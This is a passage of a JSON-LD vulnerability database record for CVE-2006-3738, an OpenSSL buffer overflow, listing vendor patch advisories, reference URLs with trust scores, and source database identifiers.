            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Critical Patch Update - January 2007",
            "trust": 0.8,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "title": "HPSBUX02174",
            "trust": 0.8,
            "url": "http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00805100"
          },
          {
            "title": "HPSBUX02174",
            "trust": 0.8,
            "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/HP-UX/HPSBUX02174.html"
          },
          {
            "title": "openssl (V2.x)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=1003"
          },
          {
            "title": "openssl (V4.0)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=459"
          },
          {
            "title": "secadv_20060928",
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "title": "RHSA-2006:0695",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2006-0695.html"
          },
          {
            "title": "102711",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "title": "readme_iwss11_sol_patch7_b1182",
            "trust": 0.8,
            "url": "http://www.trendmicro.com/ftp/jp/ucmodule/iwss/sol/11/readme_iwss11_sol_patch7_b1182.txt"
          },
          {
            "title": "TLSA-2006-33",
            "trust": 0.8,
            "url": "http://www.turbolinux.com/security/2006/TLSA-2006-33.txt"
          },
          {
            "title": "TLSA-2007-52",
            "trust": 0.8,
            "url": "http://www.turbolinux.com/security/2007/TLSA-2007-52.txt"
          },
          {
            "title": "Critical Patch Update - January 2007",
            "trust": 0.8,
            "url": "http://otn.oracle.co.jp/security/070119_77/top.html"
          },
          {
            "title": "RHSA-2006:0695",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2006-0695J.html"
          },
          {
            "title": "TLSA-2006-33",
            "trust": 0.8,
            "url": "http://www.turbolinux.co.jp/security/2006/TLSA-2006-33j.txt"
          },
          {
            "title": "TLSA-2007-52",
            "trust": 0.8,
            "url": "http://www.turbolinux.co.jp/security/2007/TLSA-2007-52j.txt"
          },
          {
            "title": "vu386964-547300",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/vu386964-547300.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.7,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 2.1,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.8,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 1.2,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.8,
            "url": "http://www.frsirt.com/english/advisories/2006/3820"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta06-333a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta07-017a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta06-333a"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta07-017a"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-3738"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130/"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa06-333a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-017a.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
          },
          {
            "trust": 0.4,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.4,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
          },
          {
            "trust": 0.3,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.3,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.3,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.2,
            "url": "https://www.niscc.gov.uk)."
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.1,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://enigmail.mozdev.org"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-200710-06.xml"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/9986131"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/vmtn/technology/security/security_response.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4339"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/3069097"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0494"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0493"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001167-v51bb27-es-20070321"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001163-v51bb26-es-20070315"
          },
          {
            "trust": 0.1,
            "url": "http://h30097.www3.hp.com/cma/patches.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=duxkit1001165-v40fb22-es-20070316"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001166-v40gb22-es-20070316"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001160-v51ab24-es-20070314"
          },
          {
            "trust": 0.1,
            "url": "http://pgp.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openssl.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayproductinfo.pl?productnumber=hpuxwssuite"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com/portal/swdepot/displayproductinfo.do?productnumber=b6834aa"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2969"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26977.html"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26866.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3747"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26864.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "56053"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "56053"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
